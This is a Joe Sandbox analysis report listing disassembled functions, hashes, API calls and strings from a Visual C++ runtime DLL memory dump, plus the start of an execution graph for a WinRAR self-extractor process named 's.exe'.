Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: Name::operator+
String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
API String ID: 2943138195-757766384
Opcode ID: 8ec89114dc1e92fb087ff84a90b975bd849231731579a14e6ae3ff20f009c8f1
Instruction ID: f4d7375158b3fc1cf319c244564212f4ac27a0ac0a577c98ebed872f8e82aa37
Opcode Fuzzy Hash: 8ec89114dc1e92fb087ff84a90b975bd849231731579a14e6ae3ff20f009c8f1
Instruction Fuzzy Hash: 1B715DB1B08E4294EB14AF16D9401BC66B0BB05BA4F4485FBDA5D47AB8EF3CE175CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A453690 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A456710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A45239E), ref: 00007FFE1A45671E

EncodePointer.KERNEL32 ref: 00007FFE1A4536DC
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE1A45372B
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A45389F

Strings

MOC, xrefs: 00007FFE1A4536F0
RCC, xrefs: 00007FFE1A4536F9

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: bda6881e4fb6ddd96fb50e60b72b5d1eaa618bcc944dda4a5bc0b193bb5b3b27
Instruction ID: 8141f7a08248614ccb6f765a2cdc714d694623d21637336d0a2bdc5609fc6457
Opcode Fuzzy Hash: bda6881e4fb6ddd96fb50e60b72b5d1eaa618bcc944dda4a5bc0b193bb5b3b27
Instruction Fuzzy Hash: 48613AB7A08B858AE718DF66D4803BD77A0FB44B98F1441A6EE4D13B68DF38E065C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A459FA4 Relevance: 7.6, APIs: 5, Instructions: 94COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFE1A45A01D
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A03F
DName::DName.LIBVCRUNTIME ref: 00007FFE1A45A052
DName::DName.LIBVCRUNTIME ref: 00007FFE1A45A089
DName::DName.LIBVCRUNTIME ref: 00007FFE1A45A094

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: NameName::$Name::operator+
String ID:
API String ID: 826178784-0
Opcode ID: 7682a6ebcb32bf14f43659220100a1b4a5a4a6e3db385e7ce84af32120df353b
Instruction ID: 481c71f12d8dc657a2eb355d85b103667f52c7a1ab074373772cce4ab92c22e3
Opcode Fuzzy Hash: 7682a6ebcb32bf14f43659220100a1b4a5a4a6e3db385e7ce84af32120df353b
Instruction Fuzzy Hash: CF4147A2B18F5699EB10EF22D8841B833B4BB15FA4B5444F3EA5D533A5DF38E865C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A454044 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A456710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A45239E), ref: 00007FFE1A45671E

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4541C3

Strings

csm, xrefs: 00007FFE1A454093
csm, xrefs: 00007FFE1A4541FD
, xrefs: 00007FFE1A454114

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: abort
String ID: $csm$csm
API String ID: 4206212132-1512788406
Opcode ID: a1e41bd14f4dc8a012b9b6851bae8dba3a2639313cd67671a1d4b299b7556132
Instruction ID: ec594808b087c04fd1a0d2c26028ba867c211003b764cc75c8273e96fe0df898
Opcode Fuzzy Hash: a1e41bd14f4dc8a012b9b6851bae8dba3a2639313cd67671a1d4b299b7556132
Instruction Fuzzy Hash: 9371D3B2B08A9186D7249F22944477D7BA1FB04FE8F1481B6EF4C4BAA6CB3CD461C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A453E1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A456710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A45239E), ref: 00007FFE1A45671E

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A453F13
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE1A453F23

Strings

csm, xrefs: 00007FFE1A453F75
csm, xrefs: 00007FFE1A453E66

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: Frameabort$EmptyHandler3::StateUnwind
String ID: csm$csm
API String ID: 4108983575-3733052814
Opcode ID: 723d316c6bb1492db26d318ced58129fbbb71e04f86aecbd325fb3d3c805e488
Instruction ID: e9fd3555d480e4ebadda4588c98b609b91d73cdf49de688a137fe66b11dbd346
Opcode Fuzzy Hash: 723d316c6bb1492db26d318ced58129fbbb71e04f86aecbd325fb3d3c805e488
Instruction Fuzzy Hash: E1515CB2B08A8286EA64AB57945427876E0FB44FA5F1441B7DB8D47AE5CF3CF860C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A45A714 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFE1A45A778

Strings

%lf, xrefs: 00007FFE1A45A7BE

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: NameName::
String ID: %lf
API String ID: 1333004437-2891890143
Opcode ID: f37b8968dc856f8c22d72c120ca4476383f363961e161f929d9d255907aecf6d
Instruction ID: 52a06e46274a47030e9f96064f132dc5cc12c5c0162778aa279589fb8ebc8a47
Opcode Fuzzy Hash: f37b8968dc856f8c22d72c120ca4476383f363961e161f929d9d255907aecf6d
Instruction Fuzzy Hash: 6F31B4B2B0CF8585EA60DB26A8502797370FB45F94F4481F3E9AE87265CF3CD5518740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A452400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A456710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A45239E), ref: 00007FFE1A45671E

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A45243E

Strings

csm, xrefs: 00007FFE1A452420
MOC, xrefs: 00007FFE1A452418
RCC, xrefs: 00007FFE1A452410

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: abortterminate
String ID: MOC$RCC$csm
API String ID: 661698970-2671469338
Opcode ID: b838753ef247b2fc749e3877e0128dea9035de62b0ba29f15289213c97603889
Instruction ID: 4707af12d9462f3d6f2484c01aa28e356b36a809efe0c17d0255c4ddf99349d1
Opcode Fuzzy Hash: b838753ef247b2fc749e3877e0128dea9035de62b0ba29f15289213c97603889
Instruction Fuzzy Hash: 86F03C76A18A4682EB506F66A1810797665EB48F64F1950F3E74807262CF3CD4B0CA41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A45E9E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__C_specific_handler.LIBVCRUNTIME ref: 00007FFE1A45E9F0

Part of subcall function 00007FFE1A45EC30: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE1A45ECF0
Part of subcall function 00007FFE1A45EC30: RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FFE1A45E9F5), ref: 00007FFE1A45ED3F

Part of subcall function 00007FFE1A456710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A45239E), ref: 00007FFE1A45671E

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A45EA1A

Strings

f, xrefs: 00007FFE1A45E9F5
csm, xrefs: 00007FFE1A45E9FB

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: C_specific_handlerCurrentImageNonwritableUnwindabortterminate
String ID: csm$f
API String ID: 2451123448-629598281
Opcode ID: c9fb23446a5b638453e0304dd207887769bfaeb8010eb75ee95ffcfd07f137de
Instruction ID: b479b3da4346521d8074b59fb9537204e4fa657b5a33c0ea2cf2e72905c2445c
Opcode Fuzzy Hash: c9fb23446a5b638453e0304dd207887769bfaeb8010eb75ee95ffcfd07f137de
Instruction Fuzzy Hash: 57E037A5F18B4181D7307B62B14117D66A5AF15F64F1480F6D64807656CE78D8B04641

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A459CC0 Relevance: 6.2, APIs: 4, Instructions: 193COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A45C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C459
Part of subcall function 00007FFE1A45C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C492
Part of subcall function 00007FFE1A45C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C7BB

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A459E19
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A459E78
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A459EAA
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A459EBA

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: f50f9f5b0f4c072e52125a456639a7d4e2bd829a5a5137cb56b4f6bb80237050
Instruction ID: 996857dac50c7e8b3cf74c3128a7ebda37b01281f1425cd5fdf23e82d048d11c
Opcode Fuzzy Hash: f50f9f5b0f4c072e52125a456639a7d4e2bd829a5a5137cb56b4f6bb80237050
Instruction Fuzzy Hash: B4918EA6F08F5689FB119BA2D8403BC2BB0BB05B24F5440F7DA4D576A6DF3CA865C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A45A44C Relevance: 6.1, APIs: 4, Instructions: 134COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFE1A45A4F1
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A501
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A51E
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A553

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID:
API String ID: 168861036-0
Opcode ID: fdc850366a52cc8509fdc883a27d076c67a20e363f2b2ed3a2a440fa302089d7
Instruction ID: b4e96470f146aab0293c23c966a862d76a51084b61ddae11b320a541f2fb1d8e
Opcode Fuzzy Hash: fdc850366a52cc8509fdc883a27d076c67a20e363f2b2ed3a2a440fa302089d7
Instruction Fuzzy Hash: 405169B2F18B5A89E711DF22E8447BC37A0BB44B68F5480B2DA5E477A5DF39E461C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A45C87C Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A45C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C459
Part of subcall function 00007FFE1A45C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C492
Part of subcall function 00007FFE1A45C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C7BB

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C8F7
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C906
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C982
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C991

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 010c9cc7b649f2daabbc83b7255f351f4a32df461fe661a6f710ba75eaae01a6
Instruction ID: 8d907fbcc80c657dde9576ae18326677b863449b53272ee15ec5d3a58e6a5ca5
Opcode Fuzzy Hash: 010c9cc7b649f2daabbc83b7255f351f4a32df461fe661a6f710ba75eaae01a6
Instruction Fuzzy Hash: 624164B2B08B858AEB01DF66D8413BC77B0BB44B68F5481A6DA8D57769DF3894A1C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A454710 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A456710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A45239E), ref: 00007FFE1A45671E

_CreateFrameInfo.LIBVCRUNTIME ref: 00007FFE1A4547E6
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A454844

Strings

csm, xrefs: 00007FFE1A4548EA

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: abort$CreateFrameInfo
String ID: csm
API String ID: 2697087660-1018135373
Opcode ID: f6943bea1c78c8542bb5a279c29cdd6a6ec40214996e776607272464948ef889
Instruction ID: e20f068562fb8a79c6376a3f11815f6f1b5ea2c11c22a2b7706f1c1482beb7f7
Opcode Fuzzy Hash: f6943bea1c78c8542bb5a279c29cdd6a6ec40214996e776607272464948ef889
Instruction Fuzzy Hash: 6E514FB6718B4186D620AB26E04127E77B5F788FA0F1415B6EB8D07B66CF38D461CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A459BAC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A459CAA

Strings

void , xrefs: 00007FFE1A459C34
void, xrefs: 00007FFE1A459C0C

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: Name::operator+
String ID: void$void
API String ID: 2943138195-3746155364
Opcode ID: ff67bb32e799e4a453516f5f2b265aba841f0c9d9f12838b8a28f15594d75a10
Instruction ID: fdc32364626f0b2789df4b3192eb21c8d56db032a9ea0fa3e03a73e331164180
Opcode Fuzzy Hash: ff67bb32e799e4a453516f5f2b265aba841f0c9d9f12838b8a28f15594d75a10
Instruction Fuzzy Hash: BB3159A6F18E5598FB01DBA1E8410FC33B0BB49B58B4405B7DE4D53B69DF389164C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A45604F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A4563F0: RtlPcToFileHeader.KERNEL32 ref: 00007FFE1A456434
Part of subcall function 00007FFE1A4563F0: RaiseException.KERNEL32 ref: 00007FFE1A45647A

RtlPcToFileHeader.KERNEL32 ref: 00007FFE1A4560BF

Strings

Bad dynamic_cast!, xrefs: 00007FFE1A456072
Access violation - no RTTI data!, xrefs: 00007FFE1A45604F

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: FileHeader$ExceptionRaise
String ID: Access violation - no RTTI data!$Bad dynamic_cast!
API String ID: 3685223789-3176238549
Opcode ID: d06b4d24d7aa4607bffac334420f89fbd77c373aef9fdd9199db5b082a62258c
Instruction ID: 77a8a98164203b78b10b3da5ce8721de4c4edb34ad194b7efa84b1de598d03d5
Opcode Fuzzy Hash: d06b4d24d7aa4607bffac334420f89fbd77c373aef9fdd9199db5b082a62258c
Instruction Fuzzy Hash: 49015EA1B29E4692EE40EB16E450178A360FF90FA4F4454F3D61E476B6EF6CD524C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A4563F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FFE1A456434
RaiseException.KERNEL32 ref: 00007FFE1A45647A

Strings

csm, xrefs: 00007FFE1A456467

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 04e89f2c23f7d49b97199698fdfbf86ccf7878464e1c577e170b006b6ea557c8
Instruction ID: 24809a1097e044ec1e9fade81df69fa3e485ba4df1af179a0e31790d86056fee
Opcode Fuzzy Hash: 04e89f2c23f7d49b97199698fdfbf86ccf7878464e1c577e170b006b6ea557c8
Instruction Fuzzy Hash: A0113D32618F8182EB518F16F440269B7A5FB88F94F2842B2DE9C07B68EF3CD561C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1A45672C Relevance: 5.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FFE1A4565B9,?,?,?,?,00007FFE1A45FB22,?,?,?,?,?), ref: 00007FFE1A45674B
SetLastError.KERNEL32(?,?,?,00007FFE1A4565B9,?,?,?,?,00007FFE1A45FB22,?,?,?,?,?), ref: 00007FFE1A4567D4

Memory Dump Source

Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: c7aaac8a80d8b30c274ca3e3b7c59e83a4e0092024cc1b5b0b7c72c8c7be0031
Instruction ID: fdb1df9c94b19d349ed69f8c166ea8bf2120ad24cba9874ee0081fe6e84b312c
Opcode Fuzzy Hash: c7aaac8a80d8b30c274ca3e3b7c59e83a4e0092024cc1b5b0b7c72c8c7be0031
Instruction Fuzzy Hash: D1112164B0DA5242FA54AB27B804134A2A1AF48FB0F1846F6D97E077F5DF2CE8618700

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: s.exePID: 7688, Parent PID: 7612COMMON

Execution Graph

Execution Coverage:	11.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.7%
Total number of Nodes:	1573
Total number of Limit Nodes:	28

Executed Functions

Function 000FDF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000F0863: GetModuleHandleW.KERNEL32(kernel32), ref: 000F087C
Part of subcall function 000F0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000F088E
Part of subcall function 000F0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 000F08BF

Part of subcall function 000FA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 000FA655

Part of subcall function 000FAC16: OleInitialize.OLE32(00000000), ref: 000FAC2F
Part of subcall function 000FAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 000FAC66
Part of subcall function 000FAC16: SHGetMalloc.SHELL32(00128438), ref: 000FAC70

GetCommandLineW.KERNEL32 ref: 000FDF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 000FDF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 000FDF94
UnmapViewOfFile.KERNEL32(00000000), ref: 000FDFCE

Part of subcall function 000FDBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 000FDBF4
Part of subcall function 000FDBDE: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 000FDC30

CloseHandle.KERNEL32(00000000), ref: 000FDFD7
GetModuleFileNameW.KERNEL32(00000000,0013EC90,00000800), ref: 000FDFF2
SetEnvironmentVariableW.KERNEL32(sfxname,0013EC90), ref: 000FDFFE
GetLocalTime.KERNEL32(?), ref: 000FE009
_swprintf.LIBCMT ref: 000FE048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 000FE05A
GetModuleHandleW.KERNEL32(00000000), ref: 000FE061
LoadIconW.USER32(00000000,00000064), ref: 000FE078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 000FE0C9
Sleep.KERNEL32(?), ref: 000FE0F7
DeleteObject.GDI32 ref: 000FE130
DeleteObject.GDI32(?), ref: 000FE140
CloseHandle.KERNEL32 ref: 000FE183

Strings

%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 000FE039
STARTDLG, xrefs: 000FE0BE
winrarsfxmappingfile.tmp, xrefs: 000FDF77
sfxstime, xrefs: 000FE055
sfxname, xrefs: 000FDFF9
C:\Users\user\Desktop, xrefs: 000FDF33

Memory Dump Source

